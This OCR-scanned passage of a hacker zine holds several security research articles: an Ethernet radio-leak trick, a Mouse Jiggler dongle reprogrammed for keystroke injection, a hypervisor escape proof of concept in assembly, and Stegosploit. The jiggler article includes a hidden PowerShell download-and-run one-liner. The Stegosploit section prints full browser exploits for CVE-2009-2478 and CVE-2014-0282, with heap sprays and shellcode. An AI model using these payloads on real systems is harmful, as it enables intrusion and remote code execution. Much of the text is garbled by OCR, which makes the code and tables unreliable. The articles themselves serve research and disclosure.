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4.7.2 From Ethernet to ^Ether with Made- 
line 



In a row house in Philly 

that was covered with vines 
Was an Ethernet network 

in four twisted lines 
In four twisted lines 

they ran to the laundry 
And to the satellite dish 

and to the pantry 
The twists ended too soon 

and ceased to align 
Interfering with 10 meters 

all down the line 

The protocol 

was Madeline. 



It's clear enough that you could transmit Morse 
code through Wifi by sending bursts of traffic, but 
what about wired Ethernet? 

Some folks are very particular when wiring 
CAT5e cable, ensuring that the twisted pairs are 
untwisted at the last possible position before the 
connector. Other folks— such as your neighborly 
authors— are far less particular in their wiring, and 
when the wiring is performed poorly, interference is 
observed near 28.121 MHz! 

Still better, the interference varies with traffic! 
When the network is idle, the interference appears 
as a nice thin carrier wave. When the network is 
busy, the interference grows to be nearly four hun- 
dred Hertz wide. 

The following is a letter of Morse code transmit- 
ted from (poorly) wired Ethernet to the 10-meter 
band through what we are calling the Madeline pro- 
tocol. This transmission isn't strong enough to carry 
very far, but the Baudline-generated waterfall in 
that figure was recorded from outside of a real house, 
with a signal generated by a real Ethernet network. 
The recording was made by an Upper SideBand re- 
ceiver tuned to 28.120 MHz. 20 The narrow-band 
signal at 28.121 MHz becomes wide whenever lots 
of traffic goes across the wired network; in this case, 
from activity on a VNC session. 

20 unzip pocorgtfo08.pdf madelinek.wav 




4.8 Patching FLDigi 

All of this high-falutin' theorizin' don't do a lick of 
good without some software to back it up. Sup- 
posing that Alice is a modern unix programmer, 
but that Bob hasn't written code for anything more 
modern than a Commodore 64, Alice will need to 
provide him with a GUI application that easily in- 
terfaces with his radio. 

The most direct route for this is to patch FLDigi, 
a popular open source application for digital com- 
munication over ham radio with a live operator. In- 
ternally, FLDigi implements softmodems for CW, 
PSK31, RTTY, WEFAX, and several other proto- 
cols. 

4.9 Part 97; or, Don't be a Jerk! 

Be aware that in general, it's both illegal and im- 
moral to be a jerk on the amateur bands. Interfer- 
ence is forbidden in amateur radio, not because jam- 
ming research is bad, but because it's rude to stomp 
on someone else's transmission. Cryptography is 
forbidden in amateur radio, not because of any evil 
conspiracy to destroy privacy, but because cryp- 
tography makes a transmission opaque, preventing 
newcomers from joining the conversation. 

So for those of you who do not live in Nehemiah 
Scudder's oppressive theocracy, please be so kind as 
to keep your polyglot messages unencrypted. Make 
a fox hunt of sorts out of your protocol experimen- 
tation, with the surface PSK31 message advertising 
your callsign along with the name and parameters 
of your real protocol. 



We hope that this article has taught you a lit- 
tle about radio and signal processing. Get an ama- 
teur license, build a station, and start experimenting 
with new protocols on the friendly airwaves. 

73 's from Appalachia, 
—Travis and Muur 
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5 Jiggling into a New Attack Vector 



by Mickey Shkatov 



Note: The manufacturer of the device discussed 
in this article is not distributing anything danger- 
ous. This is a legitimate tool that can be made into 
something dangerous. 

One day, during a conversation with my col- 
league Maggie Jauregui, she showed me a USB 
dongle-like device labeled Mouse Jiggler and told 
me this nifty little thing's purpose is to jiggle the 
mouse cursor on the screen. Given my interest in 
USB, I expected that the device might be a cheap 
microcontroller emulating USB HID. If there were a 
way to reprogram that microcontroller, it could be 
made into something malicious! 

I looked for more information about this pecu- 
liar device. I found the exact same model (the MJ-2) 
that Maggie had showed me, but the website listed 
information about a newer, smaller model, the MJ- 
3. As the website describes it, 

The MJ-3 is programmable, making it 
ideal for repetitive IT or gaming tasks. 
You can create customized scripts with 
programmed mouse movement, mouse 
clicks, and keystrokes. 

"The MJ-3 is programmable." There was really 
no need to read any further. This was all the moti- 
vation I needed. I purchased one online. The cost 




of this device was just twenty dollars, which is quite 
cheap if you ask me. 

While I waited for the thing to arrive, I contin- 
ued to read some other interesting facts about the 
device. Here are some highlights: 

1. MJ-3 is even smaller— roughly the size of a 
dime-at just 0.75" x 0.55" x 0.25" (18mm x 
14mm x 6mm). 

2. IT professionals use the Mouse Jiggler to pre- 
vent password dialog boxes due to screensavers 
or sleep mode after an employee is terminated 
and they need to maintain access to their com- 
puter. 

3. Computer forensic investigators use Mouse 
Jigglers to prevent password dialog boxes from 
appearing due to screensavers or sleep mode. 

A quick look at WiebeTech, the company that 
makes these devices, reveals the forensic nature of 
the use case. 

WiebeTech, the manufacturer of the MJ-3, 
makes all sorts of forensics equipment including 
write-blocks, forensic erasers, digital investigation 
tools, and other devices. 

I already had plans to sniff the USB traffic, track 
down the microcontroller datasheet, and create a 
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tool to reprogram it. However, I later found a com- 
mercial piece of software that does exactly that. I 
had to download and play with it. 

This software was able to program the MJ-3 to 
be a keyboard, pre-programmed with up to two hun- 
dred key strokes that cycle in a loop. 

To sum up, we've got a tiny USB dongle that 
looks like a wireless mouse receiver. It is pro- 
grammable with keystrokes, and costs next to noth- 
ing. So what's next? Malicious re-purposing, of 
course! 

Unlike other programmable USB HID devices- 
such as the USB Rubber Ducky, which has far 
greater storage capacity for keystrokes— we are left 
with only about 200 characters. 

I say characters because it is easy to explain that 
way. Each line item in a script for this device can 
hold more than a single character. Each item holds 
a combination of modifier keys, a letter key, and a 
delay of up to 255 seconds. The byte-by-byte break- 
down and explanation can be found at the end of 
this article. 

These are 200 characters: 
000000000000000000000000000000 
000000000000000000000000000000 
000000000000000000000000000000 
000000000000000000000000000000 
000000000000000000000000000000 
000000000000000000000000000000 
00000000000000000000 

Not a lot, but still enough for some fun. Let's be- 
gin by opening an administrator command prompt. 

1. Press Ctrl+Escape. Delay 0 seconds. 

2. Press C. Delay 0 seconds. 

3. Press M. Delay 0 seconds. 

4. Press D. Delay 0 seconds. 

5. Press Ctrl+Shift+Enter. Delay 2 seconds. 

6. Press Left arrow. Delay 0 seconds. 

7. Press Return (Enter). Delay 0 seconds. 

8. Delay 2 seconds. 

Once the last event is done, we might simply tell 
the controller to jump to Event 8 to remain in a 
delay loop and stop executing. 

The result is an eight-line script for opening 
an administrator command prompt, which was fun 



and easy. However, a red t earner wanting to use 
this thing would need more than just a command 
prompt. How about a PowerShell download and ex- 
ecute one liner from the Rubber Ducky Exploit wiki 
written by Mubix? If we use a URL-shortening ser- 
vice, we can save a few characters and squeeze that 
into something like the following 152 characters. 

1 powershell — windowstyle hidden (new— object 

System . Net . WebClient ) . DownloadFile ( ' http 
:// bit . ly/lngVd9i V%TEMP%\bob.zip ') ; 
Start-Process "%TEMP%\bob . zip" 



I'll leave the rest of the red team thinking to you. 
If you do make a cool and nifty script, please share 
it. You can find the dump and description of the 
sniffed USB communication below. Enjoy! 

Dongle programming communication looks like 
this, as a sequence of OUT data packets in order. 

• OB 00 30 00 AA 04 00 00 92 

Prefix packet indicating the number of com- 
mands to be sent and ending in some sort of 
checksum (92). The only checksum/CRC link 
found in the client software uses the QT check- 
sum function, which is CRC16-CCITT based. 
Why don't you try to figure this one out? 

• OB 01 32 02 FF 04 00 00 00 

Data packet specifying a command. (Fig- 
ure 7.) 

• OB 02 32 00 00 05 00 00 00 

Data packet specifying a command. 

• OB 03 32 00 00 06 00 00 00 

Data packet specifying a command. 

• OB 04 35 00 01 00 00 00 00 

Data packet specifying the final command 
telling the controller to jump to which com- 
mand after the last one has been executed. 

• OC 00 00 00 00 00 00 00 00 

A suffix command to indicate the end of pro- 
gramming. 

Each command to be programmed on the 
controller is sent over USB. As an example, 
Figure 7 examines the bytes of the "Windows 
key+Ctrl+Alt+Shift+A" line of the script. 
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OB 01 32 02 FF 04 00 00 00 


OB 


A prefix sent with each data packet 


01 


The index of the command sent in this data packet 


32 


Packet type: 




31 is Mouse 




32 is Keyboard 




34 is Delay 


02 


The delay in seconds after the keystroke has been performed by the controller. 


FF 


A bit flag for indicating key modifiers pressed. 




88 Windows key-10001000 




44 Alt key-01000100 




22 Shift key-00100010 




11 Ctrl key-000 10001 


04 


Represents the keyboard letter A. 




See Figure 8. 


00 00 00 


Padding 



Figure 7: Example Jiggler Packet: "Windows key+Ctrl+Alt+Shift+A' 
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5 


42 


F9 


4 


A 


23 


6 


43 


F10 


5 


B 


24 


7 


44 


Fll 


6 


C 


25 


8 


45 


F12 


7 


D 


26 


9 


4A 


Home 


8 


E 


27 


0 


4B 


Page Up 


y 


r 


no 

zo 


Return 




Delete Forward 


A 


G 


29 


Escape 


4D 


End 


B 


H 


2A 


Delete 


4E 


Page Down 


C 


I 


2B 


Tab 


4F 


Right Arrow 


D 


J 


2C 


Space 


50 


Left Arrow 


E 


K 


2D 




51 


Down Arrow 


F 


L 


2E 




52 


Up Arrow 


10 


M 


2F 


[ 


53 


Num Lock 


11 


N 


30 


] 


54 


/ Keypad 
* Keypad 


12 


O 


31 


\ 


55 


13 


P 


33 


i 


56 




14 


Q 


34 


i 


57 




15 


R 


35 




58 


Enter Keypad 


16 


S 


36 


i 


59 


1 Keypad 


17 


T 


37 




5A 


2 Keypad 


18 


U 


38 


/ 


5B 


3 Keypad 


19 


V 


39 


Caps Lock 


5C 


4 Keypad 


1A 


w 


3A 


Fl 


5D 


5 Keypad 


IB 


X 


3B 


F2 


5E 


6 Keypad 


1C 


Y 


3C 


F3 


5F 


7 Keypad 


ID 


Z 


3D 


F4 


60 


8 Keypad 


IE 


1 


3E 


F5 


61 


9 Keypad 


IF 


2 


3F 


F6 


62 


0 Keypad 


20 


3 


40 


F7 


63 


. Keypad 


21 


4 


41 


F8 







Figure 8: Jiggler Keycode Table 
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6 The Hypervisor Exploit I Sat on for Five Years 



by DJ Capelis and Daniel Bittman 

Among its many failings, peer review is especially deficient when it comes to computer security. The idea 
that a handful of busy researchers will properly review a security system described solely in a paper in the 
time they're reading through a large stack of papers is one of the extreme blind spots of our field's academic 
process. 

It is not surprising systems with holes appear in published literature. Unfortunately, there's not even 
a good process to correct these situations when holes are found. The authors of papers are not required 
to provide code, so even if one suspects a hole exists, writing a proof of concept requires reconstructing 
the system described in the paper sufficiently well enough to have something to exploit. And then, of 
course, there's no point in doing any of this work, since "I found a bug in a published system" is not usually 
publishable, unlike every single other branch of science where disproving a published result is notable. In 
computer science, it's never notable when our papers are broken. 

So neighbors, this was the situation I found myself in for the past five years or so, as I sat on a hypervisor 
bug in a research system no one really used. The authors, meanwhile, ignored e-mails, filed a patent on the 
technology described in their paper, and went on to continue a successful career in research. 

Luckily, in the intervening years, a few things happened: 

1. PoC||GTFO started publishing, which means anything our Pastor likes can be published here. And, 
especially when the Pastor has been drinking, obscurity is no bar to entry. 

2. I ran into Daniel, who was building an operating system anyway and figured making a PoC for this 
bug was something he might as well do. (I was too fed-up by this point to spend the time on it.) 

So without further ado, let me describe the system we pwn'd and how we pwn'd it. 

The paper we're breaking in this article is Secure In-VM Monitoring Using Hardware Visualization, 
published in 2009 at the ACM Conference on Computer and Communications Security. As these things go, 
in academia this is considered a "top tier" conference. Back in the dark ages, when dragons roamed the earth, 
and we didn't have support of Extended Page Tables (EPT) in our Intel chips, rapid page table switches were 
expensive. The goal of this paper was to allow quick switching between security contexts without requiring 
an expensive VMEXIT/VMENTER. The researchers cleverly leveraged CR3 Target Values, which allow a 
limited (4, usually) set of addresses that non-root VMX code can set as the page tables base in the CR3 
register. This effectively allows an untrusted operating system to switch page tables into the code used to 
do introspection without causing a VMEXIT. 

This neat hack caused the average overhead of their syscall introspection code to go from 46% to 4%. 
Which basically means that their system moved from an unreasonable performance penalty down to a level 
where someone could take it seriously. Which is nice, if they could keep the same security guarantees. 

The security constraints were implemented in the page tables, as shown in Figure 9. 

In theory, this page table setup means that the system under monitoring can never set a CR3 value 
without causing a fault, except by going through the entry and exit gates. Attempts to jump directly to the 
introspection code fail since those pages aren't mapped into the monitored code's view of memory. Attempts 
to change the CR3 value to the introspection code's page tables outside the entry gates fail because the 
next instruction executes in the context of the introspection code, where all those pages aren't mapped 
as executable. The only way to jump into the introspection code, according to the paper, is through the 
entry/exit gates code present in the shared gate pages and mapped as executable in both. 

What we really want is a way to cause the processor to jump and move page tables at the same time. In 
some other architectures (SPARC, for instance) there's the concept of a delay slot, where some instructions 
take another instruction to fill otherwise empty pipeline bubbles. In an architecture like this, jumping out 
of the security boundary is trivial. . . but this is x86; x86 doesn't have delay slots, right? 

Turns out, that is not exactly true. Quoth the Intel Architecture Manual Volume 2B on the STI instruc- 
tion: 
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Figure 9: Page Table Security Constraints 



HB«1080» | 

SeaOS Uersion 8.3-betal Booting Up ~ 
7 GB and 616 HB available memory (page size=4 KB, kmal loc=slab : ok) 
[cpul: CPUs initialized (boot=8, *APs=7: ok) 
[vfsl: Initrd loaded (16 files, 18838 KB: ok) 
[kernel]: Kernel is setup (ku=3B88, bp 1=64: ok) 
[kernel]: Setting up environment ... done (i/o/e=38881 Ettyll: ok) 
Something stirs and something tries, and starts to climb towards the light. 
Loading modules. .. monitor CR3 = 25c873888 
— > TRUSTED: 8 = 25c874888 
— > TRUSTED: 1 = 25c873BBB 
trust count 2 

Testing exploit. If you see "HALTED at 31B8", it worked. 
HALTED at 3188! 
It worked! 



Figure 10: SeaOS Exploit Running on Real Hardware 
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After the IF flag is set, the processor begins responding to external, maskable interrupts 
after the next instruction is executed. The delayed effect of this instruction is provided to allow 
interrupts to be enabled just before returning from a procedure (or subroutine). For instance, 
if an STI instruction is followed by a RET instruction, the RET instruction is allowed to execute 
before external interrupts are recognized. 

All we need to do is turn off interrupts, queue one, route the interrupt handler into the introspection 
code's address space, then MOV the introspection code's page table base into CR3 right after we re-enable 
interrupts with the STI instruction. Then we can just ROP our way through the monitor code and do as we 
please. 

And that's where I stopped at three o'clock in the morning five years ago. I had the concept, but it took 
us another five years to getting around to proving it works on real hardware. As you can see in Figure 10, 
it totally does. 

The final exploit turned out a little different. The most straightforward way to implement this in practice 
is to utilize the trap flag (TF). When you enable this, POPF has the same one-instruction delayed behavior 
that we see in STI, and so you merely just set TF with POPF and move a new value into CR3 as the next 
instruction. Thus, the resulting code looks like this: 



1 


cli 






mov rsp , 0x2500 ; we'll need a stack for the 


interrupt handler 


3 


mov rax, qword [0x1000] ; read the monitor's 


CR3 from somewhere in the trap code 




lidt [idtr] ; load the interrupt table 




5 


pushfq ; get the flags 






or qword [rsp], 100000000b ; set TF 




7 


popf ; set the flags 






mov cr3 , rax ; change address spaces 




9 


; < TF triggers interrupt here 






loop : 




11 


jmp loop 





6.1 Reproducibility 

Everything you see here can be reproduced by running the code in the vm-exploit branch of the SeaOS 
kernel tree. 21 The code for the proof of concept itself is also in that repository. 22 

6.2 Concluding Rant 

The scientific community has a structural problem. In computer science, we do not require researchers to 
build real systems that can be scrutinized. We do not have a mechanism for thorough review, so we generally 
do not bother publishing work that breaks another paper. Our field just doesn't consider a broken paper to 
be particularly notable. 

Academics in computer science are too often doomed to talk nonsense unless we fix these issues. Fur- 
ther, researchers in our field are continuing to verge towards irrelevance if they simply follow the system of 
incentives that makes it a better career move to drop a paper and file a patent than do the work of building 
real systems and determining real truths about our machines. 

To the authors of this paper in particular? 
Enjoy your useless fucking patent. 
Love, 
~djc 

21 https : //github . com/dbittman/seakernel/ 
unzip pocorgtfo08.pdf seakernel-exploit.zip 

22 https : / / github . com/dbittman/seakernel/blob/vm-exploit/drivers/ shiv/ex . s 
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7 Stegosploit 



Stegosploit creates a new way to encode browser 
exploits and deliver them through image files. 
These payloads are undetectable using current 
means. This paper discusses two broad underlying 
techniques used for image-based exploit delivery— 
Steganography and Polyglots. Browser exploits are 
steganographically encoded into JPG and PNG im- 
ages. The resultant image file is fused with HTML 
and Javascript decoder code, turning it into an 
HTML+Image polyglot. The polyglot looks and 
feels like an image, but is decoded and triggered in 
a victim's browser when loaded. 




The Stegosploit Toolkit v0.2, released along with 
this paper, contains the tools necessary to test 
image-based exploit delivery. A case study of a Use- 
After-Free exploit (CVE-2014-0282) is presented 
with this paper demonstrating the Stegosploit tech- 
nique. 

7.1 Introduction 

The probability of an exploit succeeding in compro- 
mising its target depends largely upon three factors. 
Obviously, (1) the target software must be vulner- 
able, but also the exploit code must not be (2) de- 
tected and neutralized in transit or (3) detected and 
neutralized at the destination. 

As malware and intrusion detection systems im- 
prove their success ratio, stealthy exploit delivery 
techniques become increasingly vital in an exploit's 
success. Simply exploiting an 0-day vulnerability is 
no longer enough. 

This article is focused on browser exploits. Most 

23 http : //utf -8 . jp/public/jj encode .html 

24 http : / /help . adobe . com/ en_US/FlashPlatf orm/ reference 

25 http : //aj axian. com/ archives/want -to-pack- j s-and-cs: 

26 https : / / www . exploit -db . com/ exploits/ 9 137/ 

27 http : //www. slideshare.net/saumilshah/exploit-delivi 



by Saumil Shah 

browser exploits are written in code that is in- 
terpreted by the browser (Javascript) or by pop- 
ular browser add-ons (ActionScript /Flash). When 
it comes to browser exploits, typical means of 
detection avoidance involve pay load obfuscation; 
some browser exploits will obfuscate individual char- 
acters, 23 while others will split the attack code 
over multiple script files. Others will use OLE- 
embedded documents or split the attack code be- 
tween Javascript and Flash using Externallnter- 
face. 24 

Exploit detection technology relies upon content 
inspection of network traffic or files loaded by the 
application (browser) . Content is identified as suspi- 
cious either by signature analysis or behavioral anal- 
ysis. The latter technique is more generic and can 
be used to detect 0-day exploits as well. 

I began experimenting with exploit delivery tech- 
niques involving containers that are presumed pas- 
sive and innocent: images. As a photographer, I 
have had a long history of detailed image analysis, 
exploring image metadata and watermarking tech- 
niques to detect image plagiarism. Is it possible to 
deliver an exploit using images and images alone? 

My first attempt was to convert Javascript code 
into image pixels, each character represented by an 
8-bit grayscale pixel in a PNG file. The offensive 
Javascript exploit code is converted into an inno- 
cent PNG file. The PNG image is then loaded in 
a browser and decoded using an HTML5 CANVAS. 
Decoding is performed via Javascript. The decoder 
code itself is not detected as being offensive, since it 
only performs CANVAS pixel manipulation. 

Representing Javascript as PNG pixels was ex- 
plored in 2008 by Jacob Seidelin for an entirely 
different reason, compressing bulky Javascript li- 
braries. 25 

Borrowing from the CANVAS PNG decoder, 
I demonstrated an exploit for the Mozilla Firefox 
3.5 Font Tags Remote Buffer Overflow (CVE-2009- 
2478) 26 vulnerability delivered via a grayscale PNG 
image for the first time at Hack.LU 2010 in my talk, 
"Exploit Delivery— Tricks and Techniques" 27 . The 

./ act ionscript/3/f lash/ external/Externallnterf ace . html 
-really- well- convert- it -to-a-png-and-unpack- it -via- canvas 
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function packv(b){var a=new Number ( b) . t o St ri ng ( 1 6 ); while ( a . length <8) {a=" 0 "+a} re 
turn(unescape( "%u"+a . substring (4 , 8)+"%u"+a . substring (0 ,4) ) )}var content=" " ; cont 
ent+="<pXFON r I>xxxxxxxxxxxxxxxxxxxxxxxxxxxxx </FONT></p>" ; cont ent+="<pXFONT>A 
BCEX/FONT></p>" ; cont ent+="<pXFON r I>EFGH</FONT></p>" ; cont ent+="<pXFON r I>Aaaaa </ 
FONT></p>" ; var cont ent Obj ect=document . getElementByld ( " content " ) ; cont ent Obj ect . s 
tyle . visibility=" hidden" ; contentObject . innerHTML=cont ent ; var shellcode="" ; shell 
code+=packv(2083802306) ; shellcode+=packv (2083802306) ; shellcode+=packv (208380230 
6) ; shellcode+=packv(2083802306) ; shellcode+=packv (2083802306) ; shellcode+=packv (2 
083802306) ; shellcode+=packv (2083802306) ; shellcode+=packv (2083802305) ; shellcode + 
=packv (2083818245) ; s he llcode+=packv (2083802306) ; s he llcode+=packv (2083802306) ; sh 
ellcode+=packv(2083802306) ; shellcode+=packv (2083802306) ; shellcode+=packv (208380 
2306) ; shellcode+=packv(2083802306) ; shellcode+=packv (2083802306) ; shellcode+=pack 
v(2083802305) ; shellcode+=packv (2084020544) ; shellcode+=packv (2083860714) ; shellco 
de+=packv(2083790820) ; shellcode+=packv (538968064) ; shellcode+=packv ( 16384) ; shell 
code+=packv(64) ; shellcode+=packv (538968064) ; shellcode+=packv (2083806256) ; shellc 
ode+=unescape ( "%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b 
14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%ucl20%u0dcf%uc701%uf0e2%u575 
2%u528b%u8bl0%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8bl8%u2058%ud301 
%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uclac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8% 
U247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u 
2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%uebl2%u5d86%u016a%u858d%u00b9%u0000%u6 
850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75 
e0%ubb05%ul347%u6f72%u006a%uff53%u63d5%u6c61%u2e63%u7865%u0065") ; while (( shellco 
de . lengt h%4)! = 0){s he llcode+=unescape ( "%u9090" ) }var vtables=" " ; for ( i =0; vt ables . 1 
ength <128; i++){ vt ables+=packv (2 105344) }var padding=packv (2425393296) ; var items= 
1000;var nopsled_size = 1048576; var chunk_size =4096; var mem=new Array();var chunk 
l=p add i ng ; while ( chunk 1 . length<=chunk_size ) {chunk l+=chunkl } chunk l=s he llcode+chun 
kl ; chunk l=chunkl . substring (0 ,chunk_size) ; var chunk2=chunkl ; while ( chunk2 . length< 
=nops led _ size / 2) { chunk2+=chunkl } chunk2=chunk2 . substring (0 , nopsled_size / 2) ; var c 
hunk3=padding ; while ( chunk3 . lengt h<=chunk_size ) { chunk3+=chunk3 } chunk3=vt ables+ch 
unk3 ; chunk3=chunk3 . substring (0 ,chunk_size) ; var chunk4=chunk3 ; while ( chunk4 . lengt 
h<=nops led _ size / 2) {chunk4+=chunk3 }chunk4=chunk4 . substring (0 , nopsled_size / 2) ; for 
( i =0; Kit ems ; i++){id=" "+(i%10) ; if ( i <( items / 2) ) {mem[ i] = chunk2 .substring(0, nopsle 
d_size /2 — 1 — 1 )+id } else {mem [ i ] = chunk4 . substring (0 , nopsled_size/2 — 1 — l)+id}}var cou 
nt=0;for( i=0;i<items ; i++){count+=mem[ i ] . lengt h } document .tit 1 e=count ; var search A 
rray=new Array (); funct ion escapeData (d) { var b ; var e ; var a=" "; for ( b = 0;b<d . lengt h 
;b++){e=d.charAt(b) ; if ( e="&" | | e=" ? " | | e="=" | | e="%" | | e=" " ) {e=escape ( e ) }a+=e 
jreturn ( a) } funct ion DataTranslator (){ search Array=new Array () ; search Array [0] = new 
Array ( ) ; search Array [ 0 ] [ " st r "] = " blah " ; var b=document . getElementByld ("content") ; 
i f ( document . getElementsByTagName ){ var a = 0;pTags=b . getElementsByTagName ( "p" ) ; if ( 
pTags . length >0){while (a<pTags . length ) {oTags=pTags [ a ] . getElementsByTagName ( " font 
" ) ; search Array [ a+l]=new Array ( ) ; i f ( oTags [ 0 ] ) { search Array [ a + 1] [ " st r "] = oTags [ 0 ] . i 
nnerHTML}a++}}}} funct ion GenerateHTML ( ) {var a=" " ; for ( i =1; i <search Array . length ; i 
++){a+=e scape Data ( searchArray [ i ] [ " str " ] ) }} function blowup () {DataTranslator () ;Ge 
nerateHTML ( ) } blowup ( ) ; 



Figure 11: Firefox 3.5 Font Tags Buffer Overflow Exploit for CVE-2009-2478 
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code for this exploit is shown in Figure 11, while 
the same exploit can be compressed into the follow- 
ing PNG image. 




In 2014, Sucuri reported a browser exploit cam- 
paign that used the now dubbed "255 shades of gray" 
exploit delivery technique employing the same CAN- 
VAS PNG decoder Javascript that I had demon- 
strated in 2010. 28 

Since 2010, I have been working on several tech- 
niques for sophisticated exploit delivery using im- 
ages. The results of my research have led to the 
Stegosploit toolset, which I shall use to demonstrate 
delivering and triggering an exploit for the Inter- 
net Explorer CInput Use- After- Free vulnerability 
(CVE-2014-0228) using a single image. 29 

My motivation for image-based exploit delivery 
is simple. I want to study the effectiveness of image- 
based exploit delivery, explore ramifications on ex- 
ploit detection, and evolve new mitigation tech- 
niques to combat future threats. However, my main 
motivation still remains delivering exploits in style, 
and combining them with my photography! 30 

What follows is a detailed discussion on creating 
and delivering steganographically encoded exploits 
using nothing but a single image. We shall take a 
known Internet Explorer Use- After- Free vulnerabil- 
ity (CVE-2014-0282), which is currently delivered 
using HTML and Javascript, and turn it into an ex- 
ploit that can be delivered via a single image. 



Section 7.2 introduces CVE-2014-0282, provides 
a quick tour of the Stegosploit Toolkit, and explains 
the process of steganographically encoding the ex- 
ploit code into JPG and PNG images. 

Section 7.3 deals with decoding the encoded im- 
age using Javascript in the victim's browser. 

Section 7.4 introduces HTML+Image polyglots, 
necessary for packing the decoder and steganograph- 
ically encoded exploit into a single container. 

Section 7.5 talks about some of the finer points of 
HTTP transport when it comes to exploit delivery. 



7.2 CVE-2014-0282 Case Study 

Stegosploit is a portmanteau of Steganography and 
Exploit. Using Stegosploit, it is possible to trans- 
form virtually any Javascript-based browser exploit 
into a JPG or PNG image. 

We shall start with a minified Javascript version 
of the exploit code, tested on Internet Explorer 9 
running on Windows 7 SP1. Exploit code for CVE- 
2014-0282 is shown in Figure 12. 

The exploit performs a heap spray using HTML5 
CANVAS-based on a technique first discussed at 
EUSecWest 2012 by Federico Muttis and Anibal 
Sacco, 31 and code borrowed from Peter Hlavaty's 
HTML5 Heap Spray code h5spray. 32 

The exploit sprays a simple VirtualProtect ROP 
chain and Windows command execution shellcode 
to launch calc.exe upon successfully triggering the 
IE CInput Use- After-Free vulnerability. 33 

To deliver this exploit in style, and also for vari- 
ous practical reasons, let's obey five restrictions. (1) 
No data to be transmitted over the network except 
JPG or PNG files. (2) The image displayed in the 
browser should have no visible aberration or dis- 
tortion. (3) No exploit code should be present as 
strings within the image file. (4) The image should 
decode the exploit code upon being loaded in the 
browser without any external user interaction. (5) 
Only ONE image shall be used for this exploit. 

We shall begin with a JPG image of Kevin Mc- 
Peake, who volunteered to have this exploit painted 
on his face for a demonstration at Hack In The Box 
Amsterdam 2015. 



28 https : //blog. sucuri .net /2014/02/new- if rame-injections-leverage-png-image-metadata.html 
29 https : //www . exploit-db . com/exploits/33860/ 
30 http: //www. spectral-lines. in/ 

31 http: //www. coresecurity . com/corelabs-research/publications/html5-heap-sprays-pwn-all-things 

32 http : //www . zerOmem . sk/?p=5 

33 https : //www . exploit-db . com/exploits/33860/ 
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function H5 ( ) { t his . d = [] ; t his .m=new Array (); t h is . f=new Array () }H5 . prototype . fl at 
ten=f unct ion () {for ( var f=0;f<this .d. length ; f ++){ var n=t his . d [ f ] ; if(typeof ( n)= ' 
number 1 ) { var c=n . toString(16) ;while(c. length < 8) {c='0 '+c}var l=function(a){retur 
n( parselnt (c . substr (a ,2) ,16) ) }; var g=l (6) ,h=l (4) ,k=l (2) ,m=l (0) ; this . f . push(g) ; t 
his . f.push(h) ; this . f.push(k) ; this . f.push (m) } if (typeof (n)^= ' string 1 ) {for (var d=0 
; d<n . length ; d++){ this . f.push(n. char Code At (d) ) } } } } ;H5 .prototype. fill=function(a) 
{for (var c = 0,b = 0;c<a. data . length ; c++,b++){ i f (b>=8192) {b=0}a . dat a [ c ] = (b<t h is . f . 1 
ength)?this . f [ b] : 2 5 5 } } ; H5 . prototype . spray=f unct ion (d) { t his . flatten () ; for (var b= 
0 ; b<d ; b+-h){ var c=document . createElement ( 'canvas ') ;c.width = 131072;c. height=l;var 

a=c .getContext( '2d') .createImageData(c. width ,c. height) ; this . fill (a) ; this .m[b] = 
a} } ;H5 . prototype . setData=f unct ion (a) { this . d=a} ; var f 1 ag=f a 1 s e ; var heap=new H5() 
; try { location . href= 'ms— help : '} catch ( e ){} f unct ion spray () {var a= ' \ xfc \xe8 \x89\x0 
0\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\xl4\x8b\x72\x 
28\x0f\xb7\x4a\x26\x31\xff \x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xcl\xcf \x0d\x01\ 
Xc7\xe2\xf0\x52\x57\x8b\x52\xl0\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a 
\x01\xd0\x50\x8b\x48\xl8\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x3 
l\xff \x31\xc0\xac\xcl\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x 
75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\xlc\x01\xd3\x8b\x04\x8b\ 
X01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff \xe0\x58\x5f \x5a\x8b\xl2\xeb 
\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff \xd5\xbb\xf 
0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff \xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\x 
bb\x47\xl3\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00 ' ; var 

c = [] ; for (var b = 0;b< 1104;b+=4){c . push (1371756628) }c . push (1371756627) ; c . push (137 
1351263) ; var f = [1 371 756626 , 2 1 5 , 2 147353344 , 1 371 367674 , 202 1 22408 ,4294967295 , 202 1 2 
2400, 202122404, 64, 202116108, 202121248, 16384]; var d=c . concat ( f ) ;d. push (a) ; heap . s 
etData (d) ; heap . spray (256) } function changer (){ var c=new Array (); for ( var a = 0;a<10 
0 ; a++){ c . push ( document . createElement ( ' img '))}if(flag) {document .getElementById( ' 
fm») .innerHTML=' ' ; Collect Garbage ( ) ; var b= ' \ u2020 \ uOcOc ' ;for(var a = 4;a<110;a+=2) 
{b+=' \u4242 ' }for (var a = 0;a<c .length ; a++){c [a], title =b}}}function run () {spray () ; 
document . get ElementByld ( ' c2 ' ) . checked=true ; document . getElementByld ( ' c2 ' ) . onprop 
ertychange=changer ; flag=true ; document . getElementByld ( ' fm ' ) . reset ()}setTimeout(r 
un. 1000) ; 



Figure 12: Exploit for CVE-2014-0282, to be decoded by Figure 13. 
